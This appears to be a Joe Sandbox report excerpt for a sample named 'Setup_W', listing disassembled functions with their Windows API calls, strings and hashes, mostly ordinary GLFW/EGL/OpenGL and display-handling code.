Function 64610530 Relevance: 7.6, APIs: 5, Instructions: 55timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 6461056F
GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,646013E5), ref: 64610580
GetCurrentThreadId.KERNEL32 ref: 64610588
GetTickCount.KERNEL32 ref: 64610590
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,646013E5), ref: 6461059F

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: a903fcd543008832f528e1bd1313952d38995f44d5e3bb289cbb4e52cc730063
Instruction ID: 4098e1f792661b811c022bcd4256120fdc6bdbc12b5fdcfa95f35455c30f3de0
Opcode Fuzzy Hash: a903fcd543008832f528e1bd1313952d38995f44d5e3bb289cbb4e52cc730063
Instruction Fuzzy Hash: AC11A3B150C3408FDB10EF7AD58854BBBE4FB8A251F00583AE845C7B10EA30D498C782

Function 646105F0 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 6461063F
UnhandledExceptionFilter.KERNEL32 ref: 6461064F
GetCurrentProcess.KERNEL32 ref: 64610658
TerminateProcess.KERNEL32 ref: 64610669
abort.MSVCRT ref: 64610672

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminateabort
String ID:
API String ID: 520269711-0
Opcode ID: 8e68a6bfe9dddbc9460aaad5130a9c4fb207ff0a5dea586c87432d2b2070cb2e
Instruction ID: 48baf10372db0d9f919d5919cdc0d0d1cbca1b7c8996cf0b71dbba256961bdc2
Opcode Fuzzy Hash: 8e68a6bfe9dddbc9460aaad5130a9c4fb207ff0a5dea586c87432d2b2070cb2e
Instruction Fuzzy Hash: 201116B5908344CFEB11EF6EC14464ABBF0FB8A305F44952DE88897310E775A954CF92

Function 646105EC Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 6461063F
UnhandledExceptionFilter.KERNEL32 ref: 6461064F
GetCurrentProcess.KERNEL32 ref: 64610658
TerminateProcess.KERNEL32 ref: 64610669
abort.MSVCRT ref: 64610672

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminateabort
String ID:
API String ID: 520269711-0
Opcode ID: fc46e2344d4d6732d3eed0841b46266a61fc02ddebdf8d9c360195002ec89bb4
Instruction ID: 4368150bcebd0d5d296739eab8096d8ee2dcb78995e09cae170670a87d726f28
Opcode Fuzzy Hash: fc46e2344d4d6732d3eed0841b46266a61fc02ddebdf8d9c360195002ec89bb4
Instruction Fuzzy Hash: 841105B5908384CFEB11EF7EC549659BBF0FB4A305F449429E84497300E774A944CF92

Function 64608298 Relevance: 4.5, APIs: 3, Instructions: 49windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 646082DF
FormatMessageW.KERNEL32 ref: 64608317
WideCharToMultiByte.KERNEL32 ref: 64608357

Part of subcall function 64602EF4: calloc.MSVCRT ref: 64603030
Part of subcall function 64602EF4: strcpy.MSVCRT ref: 64603079

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: ByteCharErrorFormatLastMessageMultiWidecallocstrcpy
String ID:
API String ID: 4215368167-0
Opcode ID: 3a05718e056d70fd0ea33441e74aba6124f330db38033d56e7ba3221e27b8782
Instruction ID: adaf8a1903572cba01a8a3079a11a46211bc0e26c5758607537fd6aa15b1cc0a
Opcode Fuzzy Hash: 3a05718e056d70fd0ea33441e74aba6124f330db38033d56e7ba3221e27b8782
Instruction Fuzzy Hash: AA21D6B1408345DFE750EF69C54879ABBF1FB84314F00896DE5989B290C7B89A89CF82

Function 6460BA76 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25registryCOMMON

Download Yara Rule

APIs

RegisterRawInputDevices.USER32 ref: 6460BAA3

Part of subcall function 64608298: GetLastError.KERNEL32 ref: 646082DF
Part of subcall function 64608298: FormatMessageW.KERNEL32 ref: 64608317
Part of subcall function 64608298: WideCharToMultiByte.KERNEL32 ref: 64608357

Strings

@:ad, xrefs: 6460BA83

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: ByteCharDevicesErrorFormatInputLastMessageMultiRegisterWide
String ID: @:ad
API String ID: 2565755986-2778011840
Opcode ID: fb5363f0bf1a3cf9aff41d4085d91955f89f4dea58422cea29d870e782d30371
Instruction ID: 08e6777a9edac521f99355513d5423c6298ba1827fe259af2578882fcd771688
Opcode Fuzzy Hash: fb5363f0bf1a3cf9aff41d4085d91955f89f4dea58422cea29d870e782d30371
Instruction Fuzzy Hash: 58E065714082449BDB01EFA9D6047DEBBF8EF81715F408828D98557200DB759A48CB92

Function 6460CD2B Relevance: 1.5, APIs: 1, Instructions: 10windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32 ref: 6460CD3D

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: Iconic
String ID:
API String ID: 110040809-0
Opcode ID: d72d9febf81ae622c4ab3cc3c13540e0052c0e741e5a9b0b6ecada34421a14a3
Instruction ID: 50faefa21715e4e1c21aa030e48e9c97a0ede8ffee063f6bd876839af5adcc39
Opcode Fuzzy Hash: d72d9febf81ae622c4ab3cc3c13540e0052c0e741e5a9b0b6ecada34421a14a3
Instruction Fuzzy Hash: FEC08C382042049FCB00BF6CC54D8083BF8AF45202F4044A8A8818B302DA70E8008B92

Function 646031E0 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2245ba16ef808d711bd6a6e045eb0f15c2ca42dc2bb65fd1ebafcf8c82b7c57c
Instruction ID: ca04ee5e1998c071bdabcf0428fcc9233e076c172b21be8776349022a1105c3d
Opcode Fuzzy Hash: 2245ba16ef808d711bd6a6e045eb0f15c2ca42dc2bb65fd1ebafcf8c82b7c57c
Instruction Fuzzy Hash: 9CD09E742013098BFB098F5ACA61B667BA9BF55B11F14C058DC244F741D775E581CB50

Function 646021F7 Relevance: 66.7, APIs: 18, Strings: 20, Instructions: 234
libraryloaderstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32 ref: 64602235
strncmp.MSVCRT ref: 6460227B
GetProcAddress.KERNEL32 ref: 6460229E
GetProcAddress.KERNEL32 ref: 646022B7
GetProcAddress.KERNEL32(00000000,00000000), ref: 646022D0
GetProcAddress.KERNEL32 ref: 646022E9
GetProcAddress.KERNEL32 ref: 64602302
GetProcAddress.KERNEL32(00000000,00000000), ref: 6460231B
GetProcAddress.KERNEL32 ref: 64602334
GetProcAddress.KERNEL32 ref: 6460234D
GetProcAddress.KERNEL32(00000000,00000000), ref: 64602366
GetProcAddress.KERNEL32 ref: 6460237F
GetProcAddress.KERNEL32 ref: 64602398
GetProcAddress.KERNEL32(00000000,00000000), ref: 646023B1
GetProcAddress.KERNEL32 ref: 646023CA
GetProcAddress.KERNEL32 ref: 646023E3
GetProcAddress.KERNEL32(00000000,00000000), ref: 646023FC
GetProcAddress.KERNEL32 ref: 64602415

Strings

EGL: Library not found, xrefs: 6460224F
eglInitialize, xrefs: 646022F7
eglMakeCurrent, xrefs: 646023A6
lib, xrefs: 64602273
EGL_KHR_get_all_proc_addresses, xrefs: 6460256D
EGL.dll, xrefs: 64602215
EGL_KHR_gl_colorspace, xrefs: 6460255C
EGL_KHR_create_context, xrefs: 6460253F
eglGetConfigAttrib, xrefs: 6460228B
EGL_KHR_create_context_no_error, xrefs: 6460254B
libEGL.dll, xrefs: 6460220E
eglSwapBuffers, xrefs: 646023BF
eglGetDisplay, xrefs: 646022C5
$Had, xrefs: 64602525
EGL_KHR_context_flush_control, xrefs: 6460257E
EGL: Failed to get EGL display: %s, xrefs: 646024EC
EGL: Failed to load required entry points, xrefs: 646024AE
eglGetProcAddress, xrefs: 6460240A
eglSwapInterval, xrefs: 646023D8
eglQueryString, xrefs: 646023F1

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: AddressProc$LibraryLoadstrncmp
String ID: $Had$EGL.dll$EGL: Failed to get EGL display: %s$EGL: Failed to load required entry points$EGL: Library not found$EGL_KHR_context_flush_control$EGL_KHR_create_context$EGL_KHR_create_context_no_error$EGL_KHR_get_all_proc_addresses$EGL_KHR_gl_colorspace$eglGetConfigAttrib$eglGetDisplay$eglGetProcAddress$eglInitialize$eglMakeCurrent$eglQueryString$eglSwapBuffers$eglSwapInterval$lib$libEGL.dll
API String ID: 1199942516-1957977352
Opcode ID: 65ac1f7c1dfcebc60e8067b010efb93576fb72e24fb770a1897f73224c3665fd
Instruction ID: 2be6e0a8a46068feab80a72f97e01e57a28abbd52c323695223df50d50299026
Opcode Fuzzy Hash: 65ac1f7c1dfcebc60e8067b010efb93576fb72e24fb770a1897f73224c3665fd
Instruction Fuzzy Hash: 8FA12BB450E380DFDB26DF6AC6857AAFBE4FF56708F01992DE49487640D3B58880CB52

Function 64601B16 Relevance: 45.7, APIs: 11, Strings: 15, Instructions: 231
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 6460AD78: TlsGetValue.KERNEL32(?,?,?,?,64601855), ref: 6460ADAA

glfwMakeContextCurrent.GLFW.4281411633 ref: 64601B58
strlen.MSVCRT ref: 64601BDF
strncmp.MSVCRT ref: 64601BF5
sscanf.MSVCRT ref: 64601C3A
glfwMakeContextCurrent.GLFW.4281411633 ref: 64601C72
glfwMakeContextCurrent.GLFW.4281411633 ref: 64601D19
glfwExtensionSupported.GLFW.4281411633(00000000,00000000), ref: 64601D7A
glfwExtensionSupported.GLFW.4281411633(00000000,00000000), ref: 64601DF0
glfwExtensionSupported.GLFW.4281411633 ref: 64601E09
glfwExtensionSupported.GLFW.4281411633 ref: 64601E56
glfwMakeContextCurrent.GLFW.4281411633 ref: 64601EC1

Strings

glGetStringi, xrefs: 64601CE9
glGetString, xrefs: 64601B70
Requested OpenGL ES version %i.%i, got version %i.%i, xrefs: 64601CCE
GL_KHR_context_flush_control, xrefs: 64601E4F
GL_ARB_compatibility, xrefs: 64601DE9
GL_ARB_robustness, xrefs: 64601DF9
glClear, xrefs: 64601E99
GL_ARB_debug_output, xrefs: 64601D73
GL_EXT_robustness, xrefs: 64601E02
Entry point retrieval is broken, xrefs: 64601D00
%d.%d.%d, xrefs: 64601C32
OpenGL ES version string retrieval is broken, xrefs: 64601BC3
glGetIntegerv, xrefs: 64601B5D
`Dad, xrefs: 64601CC4
OpenGL version string retrieval is broken, xrefs: 64601BB6

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: glfw$ContextCurrent.ExtensionMakeSupported.$Valuesscanfstrlenstrncmp
String ID: %d.%d.%d$Entry point retrieval is broken$GL_ARB_compatibility$GL_ARB_debug_output$GL_ARB_robustness$GL_EXT_robustness$GL_KHR_context_flush_control$OpenGL ES version string retrieval is broken$OpenGL version string retrieval is broken$Requested OpenGL ES version %i.%i, got version %i.%i$`Dad$glClear$glGetIntegerv$glGetString$glGetStringi
API String ID: 1542904474-82678582
Opcode ID: a787a4e738438449187d43e58bca56cf6b60eb0cfe523c86be57a8c95508d18e
Instruction ID: ec955498274e6c36eaf435dfca11977ababeb186932dd94b9ddddddf6aa5bf5a
Opcode Fuzzy Hash: a787a4e738438449187d43e58bca56cf6b60eb0cfe523c86be57a8c95508d18e
Instruction Fuzzy Hash: D5A115B09082059BDB099F69C2847DEBBF4FF54B0CF04C82EDC989B245D7B68581CB62

Function 646025A0 Relevance: 26.6, APIs: 6, Strings: 9, Instructions: 395
librarystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strncmp.MSVCRT ref: 64602BE0
LoadLibraryA.KERNEL32 ref: 64602C03

Strings

80, xrefs: 64602AEE
EGL: Failed to load client library, xrefs: 64602C25
lib, xrefs: 64602BD5
EGL: Failed to find a suitable EGLConfig, xrefs: 6460280C
EGL: API not available, xrefs: 646025B5
mIad, xrefs: 64602A9F
EGL: Failed to create window surface: %s, xrefs: 64602B3D
80, xrefs: 64602AE3
0ad, xrefs: 64602BA4

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: LibraryLoadstrncmp
String ID: 0ad$80$80$EGL: API not available$EGL: Failed to create window surface: %s$EGL: Failed to find a suitable EGLConfig$EGL: Failed to load client library$lib$mIad
API String ID: 2374402810-160528034
Opcode ID: cc9688509d4a1000696fc01fd3e0475209cd88f8e486569cc33c1196980ce96c
Instruction ID: 12e493b34a711624c8fe5681839838a58ab6d86c7415c144379c5bb511d2725b
Opcode Fuzzy Hash: cc9688509d4a1000696fc01fd3e0475209cd88f8e486569cc33c1196980ce96c
Instruction Fuzzy Hash: 860236B4A093048FDB59DF18D68479ABBF5EF44708F10C8AAE8899B240D775DD89CF42

Function 64609F84 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 181
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnumDisplaySettingsW.USER32 ref: 64609FF5
CreateDCW.GDI32 ref: 6460A01F
GetDeviceCaps.GDI32 ref: 6460A05B
GetDeviceCaps.GDI32 ref: 6460A070
GetDeviceCaps.GDI32 ref: 6460A0AF
GetDeviceCaps.GDI32 ref: 6460A11C
DeleteDC.GDI32 ref: 6460A164
free.MSVCRT ref: 6460A186
wcscpy.MSVCRT ref: 6460A1B4
WideCharToMultiByte.KERNEL32(00000000), ref: 6460A202
wcscpy.MSVCRT ref: 6460A226
WideCharToMultiByte.KERNEL32 ref: 6460A268
EnumDisplayMonitors.USER32 ref: 6460A2B6

Strings

, xrefs: 6460A241
Z, xrefs: 6460A0FF

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: CapsDevice$ByteCharDisplayEnumMultiWidewcscpy$CreateDeleteMonitorsSettingsfree
String ID: $Z
API String ID: 2479431636-3176842942
Opcode ID: cfe3729773b3dbd56dc1b2ca8de68bb5024125fc4389523a86a23ce57ef77d73
Instruction ID: 8ed80cccbdc88c8452718737337ac4828fed65368ce2b2488aeba01ce2f50826
Opcode Fuzzy Hash: cfe3729773b3dbd56dc1b2ca8de68bb5024125fc4389523a86a23ce57ef77d73
Instruction Fuzzy Hash: B691F6B0909319DFDB24DF29C9447DABBF0FF98710F0189ADE498A7240D7749A848F82

Function 6460737C Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 208
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32 ref: 6460739E
GetProcAddress.KERNEL32 ref: 646073CC
GetProcAddress.KERNEL32(00000000,00000000), ref: 646073E5
GetProcAddress.KERNEL32(00000001,00000001), ref: 646073FE
GetProcAddress.KERNEL32 ref: 64607417
GetProcAddress.KERNEL32 ref: 64607430
GetProcAddress.KERNEL32(00000000,00000000), ref: 64607449
GetProcAddress.KERNEL32(00000001,00000001), ref: 64607462
GetDC.USER32 ref: 64607476
ChoosePixelFormat.GDI32 ref: 646074A6
SetPixelFormat.GDI32(?,?), ref: 646074B9

Part of subcall function 64608298: GetLastError.KERNEL32 ref: 646082DF
Part of subcall function 64608298: FormatMessageW.KERNEL32 ref: 64608317
Part of subcall function 64608298: WideCharToMultiByte.KERNEL32 ref: 64608357

Strings

(, xrefs: 6460747F
%, xrefs: 64607492

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: AddressProc$Format$Pixel$ByteCharChooseErrorLastLibraryLoadMessageMultiWide
String ID: %$(
API String ID: 3228403986-93983813
Opcode ID: 2cae59ac8feba876b803e886025fcd6d9bcb592e6ae4c615f8b694617378db78
Instruction ID: a37b7c411e3238bfb69914b12a3eadec3a1d8eee3d0a0b02257eea71e55caaa7
Opcode Fuzzy Hash: 2cae59ac8feba876b803e886025fcd6d9bcb592e6ae4c615f8b694617378db78
Instruction Fuzzy Hash: 199128B0909394DFDB12EFAAC54466DFBF4FB46719F01A82DE48487240D7B68444CB53

Function 6460D15F Relevance: 19.6, APIs: 9, Strings: 2, Instructions: 334COMMON

Download Yara Rule

APIs

GetPropW.USER32 ref: 6460D18E
EnableNonClientDpiScaling.USER32 ref: 6460D1DE

Part of subcall function 6460A331: calloc.MSVCRT ref: 6460A359
Part of subcall function 6460A331: EnumDisplayDevicesW.USER32 ref: 6460A3B9
Part of subcall function 6460A331: EnumDisplayDevicesW.USER32 ref: 6460A41F
Part of subcall function 6460A331: wcscmp.MSVCRT ref: 6460A469

Strings

(, xrefs: 6460DBAB
Q, xrefs: 6460D2B4

Memory Dump Source

Source File: 00000000.00000002.2014965876.0000000064601000.00000020.00000001.01000000.00000004.sdmp, Offset: 64600000, based on PE: true

Associated: 00000000.00000002.2014952354.0000000064600000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014983192.0000000064613000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2014997687.0000000064614000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015017696.0000000064633000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015031795.0000000064636000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015046218.0000000064637000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015059806.0000000064638000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.2015074850.000000006463B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64600000_Setup_W.jbxd

Similarity

API ID: DevicesDisplayEnum$ClientEnablePropScalingcallocwcscmp
String ID: ($Q
API String ID: 2143186849-614157966
